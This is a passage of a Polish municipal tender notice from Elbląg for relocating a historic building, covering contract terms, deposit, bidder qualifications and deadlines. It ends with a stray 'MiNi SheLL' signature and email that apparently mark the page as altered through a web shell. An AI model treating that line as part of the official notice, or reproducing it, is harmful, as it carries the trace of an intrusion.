16.	W przypadku wygrania przetargu Wykonawca zobowiązany jest do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
-	ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
-	ubezpieczenie osób trzecich.
17.	W przypadku wygrania przetargu Wykonawca sporządzi harmonogram rzeczowo-finansowy wykonania robót objętych umową i przedłoży do zatwierdzenia w terminie 7 dni od daty udzielenia zamówienia.
18.	Zamawiający informuje, że roboty będą dofinansowywane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 objęty Programem Rozwoju Turystyki w obszarze Kanału Elbląskiego i Pojezierza Iławskiego na lata 2004-2006 z perspektywą lat 2007-2013.
19.	Zamawiający informuje, że do obowiązków Wykonawcy będzie należało również:
- wykonanie i zamontowanie 2 tablic informacyjnych na czas budowy informujących o uczestnictwie Unii Europejskiej w finansowaniu inwestycji,
- wykonanie i zamontowanie 1 tablicy pamiątkowej informującej o wsparciu finansowym przez Unię Europejską.
Podstawowe zasady dotyczące promocji i informacji zawarte są w Rozporządzeniu Rady (WE) nr 1083 z dnia 11 lipca 2006r. Szczegółowy zakres obowiązków państwa członkowskiego w zakresie informacji i promocji zawarty jest w Rozporządzeniu Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006r. W odniesieniu do beneficjenta mają zastosowanie Artykuły 8-9, które określają obowiązki wynikające z faktu współfinansowania projektów ze środków funduszy strukturalnych bądź z Funduszu Spójności.
Wzory tablic dostępne są pod linkiem:
http://www.rpo.warmia.mazury.pl/index.php?page=dzial&dzial_id=178.
20.	Zamawiający wymaga, aby kierownik budowy oraz kierownicy robót branżowych posiadali biegłą znajomość języka polskiego, a w przypadku, gdy którakolwiek ze wskazanych osób nie posiada biegłej znajomości języka polskiego Wykonawca jest zobowiązany zapewnić tłumacza na okres i dla potrzeb realizacji umowy.
21.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
1. 	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a)	Konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
- z przyczyn zależnych od Zamawiającego.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).
b)	Zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz.
c)	Ograniczenie zakresu robót wynikających z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego.
d)	Konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.
e)	Konieczność wykonania robót zamiennych, niewykraczających poza zakres przedmiotu zamówienia, których wprowadzenie będzie konieczne dla wykonania całości robót i uzyskania założonego efektu użytkowego.
f)	     Zmiana przepisów, które skutkują zmianą pozwolenia na budowę wydanego dla realizowanego zamówienia.
g)	Likwidacja lub rozwiązanie firmy Wykonawcy.
h)	Konieczność wykonania prac wynikających z zaleceń organów uprawnionych, np. Nadzoru budowlanego, PIP, itp.
i)	    Zwiększenie lub zmniejszenie ilości robót wynikające z rzeczywistych obmiarów.
j)	    Zmiana inspektora nadzoru, kierownika budowy, kierownika robót, koordynatora prac ze strony Zamawiającego.
k)	Zmiana Podwykonawców robót.
l)	     Zmiana numeru konta Wykonawcy lub innych danych podmiotowych.
3.	W przypadku żądania przedłużenia terminu umownego z przyczyn zależnych od Wykonawcy, zostanie przeprowadzona następująca procedura:
-	Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
-	Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
4.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.

22.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
23.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
24.	Zamawiający wymaga, aby odpady powstałe w wyniku realizacji robót były przetransportowane i zmagazynowane w miejscu unieszkodliwiania odpadów. Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu stosownych dokumentów.
25.	Zakres zamówienia:
Zakres zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym w projektach budowlano-wykonawczych rozbiórki zabytkowego budynku przy ul. 12 Lutego 5A i budowy budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego.

Zakres I etapu: Rozbiórka zabytkowego budynku przy ul. 12 Lutego 5A:
Dane ogólne:
- 	budynek wolnostojący,
- 	powierzchnia zabudowy	-	254,40 m2,
- 	powierzchnia netto		-	669,20 m2,
- 	kubatura			-        3 209,00 m3,
- 	ilość kondygnacji - trzy kondygnacje (w tym użytkowe poddasze), budynek całkowicie podpiwniczony,
-	wysokość budynku 14,00 m, wysokość budynku do kalenicy 17,45 m.

Zakres rzeczowy inwestycji obejmuje między innymi wykonanie następujących robót:
-	usunięcie 2 drzew owocowych,
-	tymczasowe i docelowe przestawienie słupa oświetleniowego usytuowanego w miejscu wjazdu na plac budowy,
-	rozbiórka zabytkowego budynku wraz z instalacjami wewnętrznymi,
-	odłączenie istniejących przyłączy,
-	zagospodarowanie terenu,
-	wykonanie i zamontowanie 1 tablicy informacyjnej na czas budowy informującej o uczestnictwie Unii Europejskiej w finansowaniu inwestycji.

Szczegółowy zakres określa dokumentacja projektowa, przedmiary robót i specyfikacje techniczne wykonania i odbioru robót budowlanych, wymienione odpowiednio w pkt III. ppkt 3. SIWZ.

Zakres II etapu: Budowa budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego:
Dane ogólne:
- 	budynek wolnostojący,
- 	powierzchnia zabudowy	-	263,40 m2,
- 	powierzchnia netto		-	667,50 m2,
- 	kubatura			-        3 200,00 m3,
- 	ilość kondygnacji - trzy kondygnacje (w tym użytkowe poddasze), budynek całkowicie podpiwniczony,
-	wysokość budynku 14,00 m, wysokość budynku do kalenicy 17,45 m.

Zakres rzeczowy inwestycji obejmuje między innymi wykonanie następujących robót:
-	rekonstrukcja w pierwotnym kształcie, materiale i konstrukcji z wykorzystaniem w maksymalnym stopniu oryginalnej substancji zabytkowej budynku,
-	przyłącze wodociągowe DN 90 i DN 50 z zewnętrznym hydrantem HP 80,
-	przyłącze kanalizacji sanitarnej DN 160,
-	przyłącze kanalizacji deszczowej DN 315,
-	przyłącze elektroenergetyczne do złącza kablowego ZK-3a,
-	sieć oświetlenia terenu z latarniami parkowymi,
-	sieć monitoringu zewnętrznego,
-	dojazd wraz z placem postojowym (parkingiem) dla samochodów osobowych o pojemności 32 stanowisk,
-	trawniki, zasadzenie drzew i krzewów,
-	elementy małej architektury,
- 	wykonanie i zamontowanie 1 tablicy informacyjnej na czas budowy informującej o uczestnictwie Unii Europejskiej w finansowaniu inwestycji,
- 	wykonanie i zamontowanie 1 tablicy pamiątkowej informującej o wsparciu finansowym przez Unię Europejską.

Szczegółowy zakres określa dokumentacja projektowa, przedmiary robót i specyfikacje techniczne wykonania i odbioru robót budowlanych, wymienione odpowiednio w pkt III. ppkt 3. SIWZ.


Zamawiający wymaga złożenia oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych o treści:
Zgodnie z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych oświadczam, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
                                              35 000,00  złotych (słownie: trzydzieści pięć tysięcy złotych),
Wadium należy wnieść przed upływem terminu składania ofert.

	Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu, 
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158, z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy

    NR  95116022020000000061913418   w  Banku Millennium S.A. O / Elbląg

Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w sekretariacie Wydziału Finansowo - Budżetowego Urzędu Miejskiego w Elblągu

2.	Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	wykonanie w sposób należyty okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj. wykonanie robót budowlanych polegających na budowie lub przebudowie budynków, w tym:
-	co najmniej 1 roboty budowlanej dotyczącej budynku wpisanego do rejestru zabytków lub zlokalizowanego na terenie objętym nadzorem konserwatora zabytków o kubaturze nie mniejszej niż 1 000 m3
-	co najmniej 1 roboty budowlanej o wartości minimum 3 000 000,00 zł brutto,

b)	zatrudnianie przeciętnie w okresie ostatnich trzech lat min. 50 pracowników, 
c)	dysponowanie:
A.	kierownikiem budowy branży ogólnobudowlanej ze stażem łącznym pracy jako kierownik budowy minimum 5 lat, 
B.	kierownikiem robót ogólnobudowlanych, który odbył co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych,
C.	kierownikami robót branżowych, tj.: robót wod.-kan., robót branży ciepłowniczej, robót elektrycznych oraz robót drogowych, z których każdy ma łączny staż pracy jako kierownik robót minimum 3 lata,

	Funkcje kierownika budowy i kierownika robót ogólnobudowlanych może pełnić ta sama osoba.
	Funkcje kierownika robót dla różnych branż może pełnić ta sama osoba, jeżeli posiada wymagane uprawnienia.
	Zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane, samodzielne funkcje techniczne w budownictwie, m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające aktualne uprawnienia budowlane, będące członkami właściwych terytorialnie okręgowych izb samorządu zawodowego (tekst jedn. Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm.).
oraz
D.	osobą lub osobami wykonującymi prace konserwatorskie i restauratorskie, niezbędnymi do wykonania przedmiotu zamówienia, które:
- posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbyły po ukończeniu tych studiów co najmniej 12 miesięczną praktykę zawodową w zakresie konserwacji i badania zabytków, a w dziedzinach nieobjętych programem wyższych studiów, o których mowa wyżej, posiadają przynajmniej średnie wykształcenie w danej dziedzinie oraz odbyły co najmniej 5 letnią praktykę zawodową w zakresie konserwacji i badania zabytków.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	osiągnięcie średniego rocznego przychodu netto ze sprzedaży i zrównanych z nimi w kwocie minimum 10 mln zł za okres ostatnich 3 lat obrotowych prowadzonej działalności, a jeżeli okres prowadzenia działalności jest krótszy, to za ten okres.

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.3. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.4. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.5., 1.6. i 1.7.  SIWZ
5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.8. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:
-    zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-   zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić roboty potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.
b)	W przedmiocie zamówienia należy podać informacje o kubaturze, wpisaniu do rejestru zabytków lub lokalizacji na terenie objętym nadzorem konserwatora zabytków, wartości roboty budowlanej.
c)	Dla robót wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te roboty zostały wykonane należycie,
d)	 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.
-  zgodnie z pkt VI. ppkt 1.4. SIWZ - Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2)  ppkt 2.b) ogłoszenia.
-   zgodnie z pkt VI. ppkt 1.5. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a)   Na potwierdzenie spełniania warunku określonego w Sekcji III.2) ppkt 2. c) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W doświadczeniu kierownika budowy branży ogólnobudowlanej należy podać liczbę lat stażu łącznego pracy jako kierownik budowy.
c)	W doświadczeniu kierownika robót ogólnobudowlanych należy podać liczbę lat stażu łącznego pracy jako kierownik robót oraz liczbę lat praktyki zawodowej odbytej na budowie przy zabytkach nieruchomych.
d)	W doświadczeniu kierowników robót branżowych tj.: robót wod.-kan., robót branży ciepłowniczej, robót elektrycznych oraz robót drogowych, należy podać odpowiednio:
-	liczbę lat łącznego stażu pracy jako kierownik robót wod.-kan., 
- 	liczbę lat łącznego stażu pracy jako kierownik robót branży ciepłowniczej, 
-	liczbę lat łącznego stażu pracy jako kierownik robót elektrycznych, 
-	liczbę lat łącznego stażu pracy jako kierownik robót drogowych.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	 Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.5. SIWZ, oprócz osoby lub osób wykonujących prace konserwatorskie i restauratorskie, należy złożyć z ofertą dokumenty: decyzje o nadaniu uprawnień oraz aktualne zaświadczenia o przynależności do właściwej okręgowej izby samorządu zawodowego, a dla osoby kierownika robót ogólnobudowlanych dodatkowo oświadczenie lub inny dokument potwierdzający spełnianie warunku odbycia co najmniej 2 letniej praktyki zawodowej na budowie przy zabytkach nieruchomych.
b)	 Dla osoby lub osób wykonujących prace konserwatorskie i restauratorskie należy złożyć z ofertą dokument potwierdzający posiadanie tytułu zawodowego magistra uzyskanego po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbycie po ukończeniu tych studiów co najmniej 12-miesięcznej praktyki zawodowej w zakresie konserwacji i badania zabytków, a w przypadku dziedzin nieobjętych programem wyższych studiów, o których mowa wyżej, posiadanie przynajmniej średniego wykształcenia w danej dziedzinie oraz odbycie co najmniej 5-letniej praktyki zawodowej w zakresie konserwacji i badania zabytków. 
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.
- zgodnie z pkt VI. ppkt 1.8. SIWZ - Części sprawozdania finansowego, tj. Rachunku zysków i strat a jeżeli część ta podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o tej części sprawozdania finansowego, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
	Uwaga:
a) Wyżej wymienione dokumenty Wykonawcy składają za ostatnie 3 lata obrotowe, za które Wykonawcy mają sporządzone sprawozdanie finansowe i które byli zobligowani wykonać.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2)  ppkt 3.a) ogłoszenia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:
1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125
82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
    data rozpoczęcia:  data udzielenia zamówienia
    data zakończenia:  30 września 2010 r.
2. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

Creat By MiNi SheLL
Email: jattceo@gmail.com